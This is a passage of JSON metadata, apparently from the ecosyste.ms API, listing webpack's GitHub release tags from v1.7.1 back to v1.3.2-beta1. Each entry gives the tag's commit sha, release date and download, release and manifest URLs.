rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"